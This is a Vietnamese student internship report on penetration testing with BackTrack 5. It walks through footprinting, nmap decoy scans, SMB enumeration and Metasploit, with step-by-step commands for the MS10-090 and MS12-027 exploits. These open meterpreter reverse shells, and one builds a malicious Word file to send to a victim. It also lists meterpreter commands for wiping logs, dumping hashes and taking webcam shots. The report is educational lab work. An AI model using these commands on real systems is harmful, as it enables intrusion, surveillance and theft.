Báo cáo cuối kỳ Athena - Report

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH
TRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ
MẠNG & AN NINH MẠNG QUỐC TẾ
ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT
Đề tài: Nghiên cứu và sử dụng các chức năng của backtrack để kiểm tra an ninh mạng
GVHD: Thầy VÕ ĐỖ THẮNG
Sinh viên thực hiện:
Phạm Minh Đạt – 51100753
Dương Thế Hiển - 51101153
Thành phố Hồ Chí Minh, ngày 11 tháng 08 năm 2014

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 1
NỘI DUNG BÀI BÁO CÁO
LỜI CAM ĐOAN....................................................................................................................................................................................................................................2
LỜI CẢM ƠN TRUNG TÂM..............................................................................................................................................................................................................3
LỜI CẢM ƠN KHOA............................................................................................................................................................................................................................4
LỜI MỞ ĐẦU.........................................................................................................................................................................................................................................5
NHẬN XÉT CỦA CÔNG TY THỰC TẬP .......................................................................................................................................................................................6
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN...............................................................................................................................................................................7
GIỚI THIÊU VỀ CÔNG TY THỰC TẬP.........................................................................................................................................................................................8
Các cơ sở ............................................................................................................................................................................................................................................8
Cơ sở 1: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8
Cơ sở 2: Tại TP Hồ Chí Minh:................................................................................................................................................................................................8
Lĩnh vực hoạt động........................................................................................................................................................................................................................8
Đội ngũ giảng viên .........................................................................................................................................................................................................................9
NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP ......................................................................................................................................................10
Footprinting ...................................................................................................................................................................................................................................10
Cở sở lý thuyết ..........................................................................................................................................................................................................................10
Cách thực hiện...........................................................................................................................................................................................................................10
Network Scanning .......................................................................................................................................................................................................................12
Cơ sở lý thuyết ..........................................................................................................................................................................................................................12
Cách thực hiện...........................................................................................................................................................................................................................13
Enumeration ..................................................................................................................................................................................................................................13
Cơ sở lý thuyết ..........................................................................................................................................................................................................................13
Cách thực hiện...........................................................................................................................................................................................................................13
Giới thiệu VMWare Workstation...........................................................................................................................................................................................15
Hệ điều hành BackTrack5 R3 .................................................................................................................................................................................................15
Giới thiệu Backtrack5 R3......................................................................................................................................................................................................15
Cài đặt Backtrack5 R3 trên VMWare ..............................................................................................................................................................................16
Công cụ Metasploit......................................................................................................................................................................................................................22
Giới thiệu Metasploit..............................................................................................................................................................................................................22
Các thành phần của Metasploit..........................................................................................................................................................................................22
Sử dụng Metasploit framework.........................................................................................................................................................................................22
Payload meterpreter..............................................................................................................................................................................................................23
Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost..........................................................................................................................24
Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7..............................................................................................................24
Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010.........................................................................................................................................28
Khai thác lỗi của Adobe Reader.........................................................................................................................................................................................29
Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP...............................................................................................................32
Tấn công qua mạng Internet, triển khai trên VPS .........................................................................................................................................................34
VPS là gì........................................................................................................................................................................................................................................34
Đặc điểm VPS.............................................................................................................................................................................................................................34
Giá trị sử dụng của VPS .........................................................................................................................................................................................................34
Khai thác thông qua VPS.......................................................................................................................................................................................................34
KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP...........................................................................................................................................................35
TÀI LIỆU THAM KHẢO...................................................................................................................................................................................................................36

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 2 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
LỜI CAM ĐOAN
Tôi xin cam đoan:
 Những nội dung trong bài báo cáo này là do tôi thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng.
 Mọi tham khảo trong báo cáo này đều được trích dẫn rõ ràng tác giả, tên công trình, thời gian, địa điểm công
bố.
 Mọi sao chép không hợp lệ, vi phạm qui chế đào tạo, hay gian lận nhóm xin hoàn toàn chịu trách nhiệm.
Các bài báo cáo hàng tuần và các video clip:
Dương Thế Hiển – 51101153
 Tuần 1:
http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-1
https://www.youtube.com/watch?v=yPISuQIlOpM
 Tuần 2:
https://www.youtube.com/watch?v=_7GrYn_zqtI&feature=youtu.be
 Tuần 3:
https://www.youtube.com/watch?v=gJdtkKWmTuc
 Clip giới thiệu cá nhân
https://www.youtube.com/watch?v=R02WiuE_tEI&feature=youtu.be
Phạm Minh Đạt – 51100753
 Clip giới thiệu và các bài báo cáo
http://tinyurl.com/baocaoathena
Video clip cuối kỳ
https://www.youtube.com/watch?v=eMblYurER_Q
TPHCM ngày 11 tháng 08 năm 2014
Nhóm sinh viên thực hiện
Phạm Minh Đạt
Dương Thế Hiển

LỜI CẢM ƠN TRUNG TÂM
Tôi xin cảm ơn giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena, cùng các anh chị trong công ty.
Đặc biệt, tôi xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian
TTCN2. Đã tạo điều kiện cũng như kiến thức trong suốt thời thời gian thực tập, đóng góp những ý kiến quý báu để
hoàn thành tốt bài báo cáo.
Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng
chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ
thực tập sắp tới.
Một lần nữa tôi xin chân thành cảm ơn.
Phạm Minh Đạt

LỜI CẢM ƠN KHOA
Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa tp.HCM và khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo
điều kiện cho tôi hoàn thành tốt đợt TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu.
Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này.
Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng
chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ
thực tập sắp tới.
Một lần nữa tôi xin chân thành cảm ơn.
Phạm Minh Đạt

LỜI MỞ ĐẦU
Theo xu hướng phát triển như hiện nay, máy tính cũng như thiết bị thông minh phát triển ngày càng mạnh trên
nền hệ thống mạng Internet. Thế nên, vấn đề bảo mật thông tin, an ninh mạng càng được chú trọng nhiều hơn. Hiện
nay, các giao dịch ngân hàng, mua bán qua mạng được thực hiện hàng ngày, hàng giờ thông qua Internet, và các tài
khoản ngân hàng là mục tiêu được các tin tặc nhắm đến. Tuy nhiên, vẫn ít có cá nhân hoặc doanh nghiệp nào chủ
động phòng tránh việc này.
Đó là lý do nhóm quyết định tham gia nghiên cứu đề tài này – “Nghiên cứu và sử dụng các công cụ của
BackTrack để nghiên cứu an ninh mạng” – để có thể chủ động phòng tránh những khai thác đến từ tin tặc và có thể
giúp đỡ người khác, các doanh nghiệp chủ động phòng tránh trước các nguy cơ mất mác do tin tặc gây ra.
Phạm Minh Đạt

NHẬN XÉT CỦA CÔNG TY THỰC TẬP
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
TPHCM, ngày …. tháng … năm 20..
Giám đốc trung tâm

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
..................................................................................................................................................................................................................
TPHCM ngày …. tháng …… năm 20…
Giáo viên hướng dẫn

GIỚI THIÊU VỀ CÔNG TY THỰC TẬPi
Các cơ sở
Cơ sở 1: Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa
Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
Cơ sở 2: Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận
1, Tp Hồ Chí Minh, Việt Nam.
Website : www.athena.edu.vn or www.athena.com.vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ
chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm
huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát
triển nước nhà.
Lĩnh vực hoạt động
 Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng,
thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng
của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
 Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác
quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
 Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với
nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học

Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự,…
Đội ngũ giảng viên
 Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất
cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư
phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia
giảng dạy tại trung tâm ATHENA.
 Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước
tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại
trung tâm ATHENA.

NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP
PHẦN I: THU THẬP THÔNG TINii
Footprinting
Cở sở lý thuyết
Footprinting là một trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin về mục tiêu nhằm xác
định:
 Hệ thống mạng của mục tiêu: Internet, Localnetwork, Wireless, …
 Host: IP, OS, …
 Owner: chủ sở hữu, location, nhân viên, …
Trong quá trình này hacker chủ yếu sử dụng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu
các thông tin hợp pháp về mục tiêu.
Footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp.
 Passive Footprinting:
o Google Search
o Browse Company Website
o Whois lookup
o Nslookup/Tracert command line
 Active Footprinting:
o Physical contact
o Email contact
Cách thực hiện
1. Lấy thông tin cá nhân của người đăng ký webserver tại trang web http://centralops.net/co/
Lấy được các thông tin cá nhân này ta có thể tiến hành các hoạt động mạo danh, lừa đảo chủ webserver để phục vụ
cho việc tấn công webserver.

2. Tìm các subdomain hoặc các domain được host tại webserver này để có thể tấn công thông qua các victim
này thay vì tấn công trực tiếp. Tiến hành tại website http://www.yougetsignal.com/tools/web-sites-on-
web-server/

3. Xác định vị trí của webserver thông qua Google Maps để có thể tiếp cận gần hơn về mặt physical.
Nếu như tại hệ thống mạng này có dùng access point ta có thể tấn công vào hệ thống nhờ access point này. Để biết
được thông tin về Access Point lận cận như: kiểu mã hóa, MAC Address, … ta có thể dùng lệnh sau tại command
promt
netsh wlan show networks mode=bssid
 BSSID chính là MAC Address của Access Point. Từ MAC Address ta có thể biết được Model của AP, default
password, mức độ bảo mật, …
 Authentication: ta có thể áp dụng nhiều biện pháp khác để tiến hành crack password AP này.
Network Scanning
Cơ sở lý thuyết
Network Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để giúp hacker quyết định kiểu tấn công
nào sẽ được dùng dể tấn công vào hệ thống. Trong quá trình tấn công, hacker sẽ tìm hiểu các thông tin về
 Host: nếu ping mục tiêu và nhận được echo reply tức là host chắc chắn tồn tại. Nếu port 139, 445 được mở thì
host đang dùng OS Windows Family từ 2000 trở lên.
 Network: scan mạng tìm ra các live host làm mục tiêu attack hoặc các NIC hoạt động trong promiscuous mode
để nhận diện các hệ thống IDS, hotneypot, …
 Vulnerability Scan: tìm ra các lỗi của OS, Services mà host đang sử dụng.
Điều kiện scanning: có khả năng kết nối tới mục tiêu
Hacker sẽ gửi các gói tin đến mục tiêu và dựa vào các gói tin trả về để phân tích tìm thông tin.

Cách thực hiện
Sử dụng công cụ NMAP (http://nmap.org/) để scan cái port, OS và services trên một host
Dùng lệnh nmap –sS –O –p 1-445 –D 192.168.222.121 192.168.222.129
Trong đó:
o -sS: syn scan
o -O: OS detection
o -p: scan từ port a-b
o -D: giả them IP để tránh log của IDS System
Enumeration
Cơ sở lý thuyết
Enumneration là bước tiếp theo kế tiếp Scanning để xác định các thông tin về host để chuẩn bị cho các bước tiếp
theo, Enumeration sẽ thu thập các thông tin về:
 Services Port: tìm các port đang mở cho dịch vụ nào
 OS: xác định chính xác hệ điều hành nào.
 User/Group xác định các thông tin về username, password,…
Nền tảng của quá trình này là sử dụng dịch vụ CIFS/Server Message Bkock (SMB) là dịch vụ khởi thủy từ IBM và
được phát triển bởi Microsoft. Dịch vụ này nhằm mục đích chia sẻ data trên mạng ngang hang giúp cho các client
trong mạng có thể dễ dàng tiếp cận data đã được chia sẻ. Dịch vụ này sử dụng SMB protocol hoạt động ở tầng
Application trong mô hình OSI. Từ Windows Vista, Microsoft đã chuyển sang dùng SMB 2.0.
Trong quá trình trao đổi SMB theo kiểu client/server sẽ diễn ra quá trình Authentication và xác định các share
resource. Mặc định Windows chấp nhận các user anonymouse trong quá trình authentication này để client có thể dễ
dàng tìm ra các share source. Connection được tạo ra bữa user anonymouse được gọi là Null Connection.
Enumeration sẽ lấy được thông tin vì có thể tạo được Null Connection với mục tiêu.
Từ Windows XP, 2003 mặc định user anonymous không nằm trong group everyone
Cách thực hiện

1. Tạo null connection với mục tiêu
2. Tìm username của bằng SID2USER
Thông tin ta thu về được sau bước này chính là SID của account. Chính con số này sẽ cho ta biết rất nhiều thứ. Dựa
vào bảng SID iii để hiểu thông tin mà SID cung cấp.
Nhìn vào kết quả thu được bên trên ta nhận thấy rằng cái SID đều
giống nhau chỉ khác phần RID, phần số cuối cùng. Và dựa vào bảng này
ta có thể tìm được tên của tài khoản Administrator của máy tính.
3. Tìm username của Administrator của máy qua SID2USER
Default Global groups (SidTypeGroup)
Domain Admins S-1-5-21-<number>-<number>-<number>-512
Domain Users S-1-5-21-<number>-<number>-<number>-513
Domain Guest S-1-5-21-<number>-<number>-<number>-514
Non-Default Global Groups (SidTypeAlias)
Example S-1-5-21-<number>-<number>-<number>-n=> 1000
Non-Default Local Groups (SidTypeAlias)
Example S-1-5-21-<number>-<number>-<number>-n=> 1000
Default Accounts (SidTypeUser)
Administrator S-1-5-21-<number>-<number>-<number>-500
Guest S-1-5-21-<number>-<number>-<number>-501
Non-Default User Accounts (SidTypeUser)
jsmith S-1-5-21-<number>-<number>-<number>-n=> 1000
Figure 1: Bảng SID

PHẦN II: SYSTEM HACKING
Giới thiệu VMWare Workstation
VMWare Workstation là một hyperviser( ảo hóa phần cứng ) chạy trên các máy tính, cho phép người dùng thiết
lập một hay nhiều máy ảo trên một máy vật lý và cho phép sử dụng đồng thời với máy thực. Mỗi máy ảo có thể thực
thi hệ điều hành của riêng mình, bao gồm các phiên bản Microsoft Windows, Linux, BSD, và MS-DOS. VMWare
Workstation được phát triển bởi VMWare, Inc.
VMWare Workstation hỗ trợ cầu nối adapter mạng tại máy chủ vật lý và chia sẻ các ỗ đĩa và các thiết bị USB với
các máy ảo. Ngoài ra, nó có thể mô phỏng ỗ đĩa. Nó có thể gắn kết một tập tin ảnh ISO vào một ổ đĩa quang ảo để máy
ảo thấy nó như là ỗ đĩa thực. Tương tự, ỗ đĩa cứng ảo được thực hiện thông qua các tập tin .vmdk .
VMWare Workstation có thể lưu trạng thái của một máy ảo bất cứ lúc nào ngay lập tức. Những trạng thái này
có thể được dùng để phục hồi đưa máy ảo về trạng thái đã lưu trước đó.
VMWare Workstation có khả năng chỉ nhiều máy ảo chạy trên nó như là tắt, tạm dừng hoặc tiếp tục, tạo điều
kiện thích hợp để thử nghiệm môi trường client-server.
Hệ điều hành BackTrack5 R3
Giới thiệu Backtrack5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong
dạng Live DVD có thể sử dụng trực tiếp từ DVD hoặc có thể cài đặt trên máy và sử dụng như một hệ điều hành.
Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật các cơ sở dữ liệu các công cụ bảo mật.
Backtrack có lịch sử phát triển qua nhiều phiên bản Linux khác nhau, phiên bản hiện nay đang sử dụng bảng phân
phối Slackware Linux và liên tục cập nhật các công cụ, driver qua các phiên bản…Công cụ kiểm thử trong bảo mật có
thể được phân loại thành các nhóm như sau:
 Information gathering : loại này chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến
mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ e-mail. Thông tin này được thu thập từ các thông tin có
sẵn trên Internet mà không cần chạm vào mục tiêu.
 Network mapping : loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin
về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.
 Vulnerability identification : Trong thể loại này bạn có thể tìm thấy các công cụ quét lỗ hổng tổng hợp và trong
các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple
Network Management Protocol (SNMP).
 Web application analysis : loại này chứa công cụ có thể được sử dụng để theo dõi, giám sát các hoạt động web.
 Radio network analysis : Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có
thể sử dụng các công cụ trong thể loại này.
 Penetration : loại này chứa công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính
mục tiêu.
 Privilege escalation : Sau khi khai thác được các lỗ hổng và truy cập vào được các máy tính mục tiêu, bạn có thể
sử dụng các công cụ loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất.
 Maintaining access : Công cụ loại này sẽ có thể sẽ giúp bạn trong việc duy trì quyền truy cập vào các máy tính
mục tiêu. Bạn có thể cần những đặc quyền cao nhất trước khi bạn có thể cài đặt công cụ để duy trì quyền truy cập.
 Voice Over IP (VOIP) : Các công cụ để phân tích VOIP.
 Digital forensics : Phân tích hình ảnh đĩa cứng cấu trúc các tập tin có thể chọn Start Backtrack Forensics trong
trình đơn khởi động.
 Reverse engineering : Gỡ rối chương trình hoặc tháo rời các tập tin thực thi.

Cài đặt Backtrack5 R3 trên VMWare
Tại giao diện chính của VMWare Workstation chọn File -> New Virtual Machine
Ta chọn Next để qua bước kế tiếp
Tiếp theo ta sẽ chọn phiên bản của hệ điều hành và đặt tên cho máy Backtrack. Ở đây tôi đặt tên máy là Backtrack5
R3

Nhấn Next để qua bước kế tiếp, trong phần disk size ta sẽ chọn 20 GB.
Tiếp theo ta chọn Next -> Finish.

Đầu tiên ta sẽ dẫn file .ISO cài đặt Backtrack5 R3
Tiếp theo ta bấm Power on this virtual machine để khởi động quá trình cài đặt. Và đợi quá trình cài đặt hoàn tất.
Để vào Desktop của Backtrack ta dùng lệnh : startx

Để hoàn tất cài đặt Backtrack5 R3 ta nhấn : Install BackTrack trên màn hình Desktop
Tiếp theo ta sẽ thiết lập một số options để quá trình cài đặt được bắt đầu.

Quá trình cài đặt sẽ mất một khoảng thời gian.
Đến đây thì quá trình cài đặt đã kết thúc, chúng ta bấm Restart Now để khởi động lại máy.
Chúng ta đăng nhập với tên là root, password là toor. Gõ startx để vào Desktop của Backtrack.

Công cụ Metasploit
Giới thiệu Metasploit
Metasploit Framework là môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây
dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler và Python. Metasploit
có thể chạy trên hầu hết các hệ điều hành Windows, Linux, MacOS.
Các thành phần của Metasploit
 Cosole interface : dùng msfconsole.bat . Msfconsole interface sử dụng được các dòng lệnh cấu hình, kiểm tra
nên nhanh hơn và mềm dẻo hơn.
 Web interface : dùng msfweb.bat giao tiếp với người dùng thông qua giao diện web.
 Command line interface : dùng msfcli.bat .
 Môi trường :
 Global Enviroment : được thực thi thông qua 2 câu lệnh setg và unsetg, những options này được gán ở
đây sẽ mang tính toàn cục, được đưa tất cả vào trong module exploits.
 Temporary Enviroment : được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa
vào module exploits hiện tại và không ảnh hưởng đến các modul exploits khác.
 Chúng ta có thể lưu lại enviroment đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu lại trong
/.msfconfig và sẽ được load trở lại khi user interface được thực hiện.
 Những options nào chung giữa giư các exploits module : LPORT, LHOST, PAYLOAD thì chúng ta sẽ xác
định ở Global Enviroment.
Sử dụng Metasploit framework
1. Chọn module exploit : lựa chọn chương trình, lỗi mà Metasploit có hỗ trợ để khai thác.
 Show exploits : xem các module mà exploit mà framework hỗ trợ.
 Use exploit_name : chọn exploit name.
 Info exploit_name : xem thông tin về module exploit.
2. Cấu hình module exploit đã chọn.
 Show options : xác định những options nòa cần cấu hình.
 Set : cấu hình cho những options của những module đó.
3. Verify những options vừa cấu hình.
 Check : kiểm tra những options đã được cấu hình chính xác chưa.

4. Lựa chọn target : lựa chọn hệ điều hành nào để tiến hành.
 Show target : những target được cung cấp bởi module đó.
 Set : xác định target nào.
5. Lựa chọn payload
 Payload là đoạn mã code sẽ chạy trên hệ thống remote machine.
 Show payloads : liệt kê ra những payload của module exploit hiện tại.
 Info payload_name : xem thông tin chi tiết về payload đó.
 Set payload payload_name : xác định tên của payload module. Sau khi chọn payload nào ta dùng lệnh show
options để xem options của payload đó.
 Show advanced : xem những advanced options của payload.
6. Thực thi exploit
 Exploit : lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin cần thiết.
Payload meterpreter
Meterpreter là viết tắt của meta-Interpreter là một advanced payload có trong Metasploit framework. Mục đích
của nó là để cung cấp những tập lệnh để khai thác tấn công các remote computer. Nó được viết từ các developer dưới
dạng shared project (.DLL) files. Meterpeter và các thành phần mở rộng được inject vào trong bộ nhớ RAM, hoàn
toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus.
Tập lệnh trong meterpreter:
help: Hiển thị menu giúp đỡ.
Background: đưa về msf promt và meterpreter được chạy nền.
cat: Hiển thị nội dung của một file.
cd & pwd: chuyển đổi các thư mục hiện hành tại máy victim.
clearev: xóa toàn bộ log của Application, System and Security trên hệ điều hành Windows.
download: tiến hành download một file từ victim về máy. Sử dụng “” khi thao tác với các đường dẫn.
edit: edit một file ở máy victim. Sử dụng trình soạn thảo vim để edit.
execute: chạy một lệnh trên máy victim.
getuid hiển thị thong tin user hiện tại meterpreter đang làm việc trên máy victim
hashdump xem nội dung của SAM database
idletime hiển thị thời gian mà người dung ở máy victim đã không hoạt động.
ipconfig hiển thị các interface và các địa chỉ IP ở máy victim
lpwd & lcd thay đổi thư mục hiện hành tại máy local
ls hiển thị danh sách các file trong thư mục hiện hành ở máy victim.
migrate đính meterpreter vào một process khác đang hoạt động ở máy victim
ps hiển thị các process đang hoạt động ở máy victim
resource chạy các lệnh meterpreter được định nghĩa trong một text file
search tìm kiếm file trên máy victim
shell tiến hành thao tác với shell của máy victim
upload upload một file từ local lên máy vicim. Sử dụng “” khi thao tác với các đường dẫn trên.
webcam_list hiển thị danh sách các webcam có thể sử dụng ở máy victim
webcam_snap chụp ảnh bằng webcam ở máy victim.
Ở đề tài nhóm chủ yếu tập trung vào khai thác bằng payload này.

Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost
Kết quả cuối cùng của việc khai thác các lỗ hổng này là tạo được một session với máy victim và đính payload
meterpreter vào máy victim để chiếm quyền điều khiển và có thể tiến hành cài backdoor vào máy nạn nhân.
Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7
Targets: Internet Explorer 6 hoặc 7
Chuẩn bị môi trường: Máy backtrack và máy victim có cài đặt IE6 hoặc IE7
Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig
Ta được IP của Backtrack : 192.168.24.128
Khởi động Metasploit của Backtrack bằng lệnh : msfconsole
Tìm kiếm mã lỗi trên Metasploit bằng lệnh : search ms10_090

Sau khi search được mã lỗi ta dùng lệnh : use windows/brower/ms10_090_ie_css_clip
Dùng lệnh show options để thể hiện các thuộc tính cần thiết của mã lỗi.
Sau khi biết các thuộc tính cần thêm vào, ta thiết lập các thuộc tính sau :
set SRVHOST 192.168.24.128
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.24.128
set uripath /hack

Dùng lệnh exploit để tiến hành khai thác lỗi. Backtrack sẽ tạo ra một link http://192.168.24.128:8080/hack khi máy
XP truy cập vào địa chỉ này sẽ tạo một session đến máy backtrack.
Quay lại máy XP, mở trình duyệt IE và truy cập vào địa chỉ http://192.168.24.128:8080/hack

Trên máy Backtrack bắt đầu có sự kết nối tới XP. Chúng ta đợi đến khi có địa chỉ kết nối vào ta sẽ tạo phiên kết nối.
Dùng lệnh sessions để kiểm tra.
Dùng lệnh sessions –i 1 để kết nối vao sessions 1.

Đến bước này meterpreter đã được inject vào trong máy của victim và ta có thể sử dụng các lệnh meterpreter thao
tác lên máy victim.
Cách phòng tránh:
 Không vào các đường link lạ, không rõ nguồn gốc.
 Sử dụng phiên bản mới nhất của Internet Explorer hoặc sử dụng các trình duyệt khác như Chrome, Firefox, …
Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010
Targets: Microsoft Office 2007, 2010
Chuẩn bị môi trường: Máy backtrack và máy victim Windows XP hoặc Windows 7 có cài đặt Microsoft Office 2007
hoặc 2010
Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig
Ta được IP của Backtrack : 192.168.24.128
Khởi động Metasploit và sử dụng lệnh để load mã lỗi
use exploit/windows/fileformat/ms12_027_mscomclt_bof

Dùng lệnh: show options để xem cái option của mã lỗi
Thiết lập file mang mã độc dùng lệnh : set FILENAME report.doc
Thiết lập PAYLOAD
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.24.138
set LPORT 4443
Cuối cùng ta dùng lệnh exploit để tạo file word đã được đính mã độc. Sau khi có được file word này ta sẽ gửi cho nạn
nhân và tiến hành lắng nghe kết nối tại máy backtrack. Để bắt đầu lắng nghe kết nối ta dùng các lệnh sau:
use exploit/multi/handler
set LPORT 4443 /* Port này giống với port lúc tạo file mã độc */
exploit
Sau bước này, bất cứ khi nào victim mở file Word chứa mã độc thì ta sẽ có được một session với máy victim tiếp theo
ta sẽ làm việc với meterpreter để chiếm quyền điều khiển máy victim.
